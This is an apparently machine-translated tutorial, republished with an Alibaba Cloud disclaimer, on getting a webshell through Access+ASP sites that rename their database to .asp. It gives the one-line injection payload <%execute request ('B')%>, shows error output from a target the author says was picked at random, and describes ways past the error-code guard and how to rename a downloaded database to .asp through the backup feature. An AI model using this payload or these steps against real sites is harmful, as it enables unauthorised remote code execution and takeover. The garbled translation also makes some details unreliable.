may be with the development of network security technology, the quality of administrators are improving, in the use of access+asp system, for the database was downloaded, to the MDB to ASP or ASA. Do not say directly to change the suffix, directly can use the net fast and other tools to download directly, in fact, so you have opened the door for intruders. Intruders can use Asp/asa as a suffix database to get Webshell directly.
1. Ideas
We all know <%%> for the ASP file identifier, that is, an ASP file will only be executed <%%> between the code, access+asp Web system all the data are stored in the database file (MDB file), Since the manager changed the MDB file to an ASP file, if the data we submitted contains <%%>, we will execute the code between <%%> when we visit the ASP database. This causes us to submit only malicious code to the database, then the ASP suffix database is our Webshell.
2. Example
Casually find a target, first we Bauku, see is not the ASP suffix database:
Return:
Microsoft VBScript Compiler Error Error ' 800a03f6 ' is missing ' end '/iishelp/common/500-100.asp, line? 4 Microsoft JET Database Engine error ' 80004005 ' D:log_mdb%29dlog_mdb%29.asp ' is not a valid path. Determine if the path name is spelled correctly, and whether to connect to the server where the file is stored.
/test/conn.asp, OK? We submit:<%execute request ("B")%>
So we put the ASP code: <%execute Request ("B")%> written to the database, then the database: is our Webshell slightly. Submit:/iishelp/common/500-100.asp, OK? 4 Microsoft VBScript run-time error error ' 800a000d ' type mismatch åä: ' execut/test/dlog/ Log_mdb/%29dlog_mdb%29.asp, okay? 26
Haha, our inserted code is running. The following figure:
Note: When we submit code to the database, the code content cannot be too large. So we use <%execute request ("B")%>.
3. Some other questions and ideas
1. For the conversion of the suffix to ASP, but also to the database to add <%= ' a ' -1%> and other illegal ASP code to completely prevent the download of the database, because there are illegal ASP code, insert our Webshell code after the run, will only show the previous illegal code error, Instead of executing our shell code. Although this can prevent a certain attack, but there is a certain hidden trouble, we just in the wrong code before adding compatible error code, you can get the correct display of the execution of our inserted Webshell code.
2. For the suffix is not changed, that is, MDB files, so we can download directly down to get the background password, into the background, you can use the database backup to change the suffix for ASP.
It may be that I have made a fuss.
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.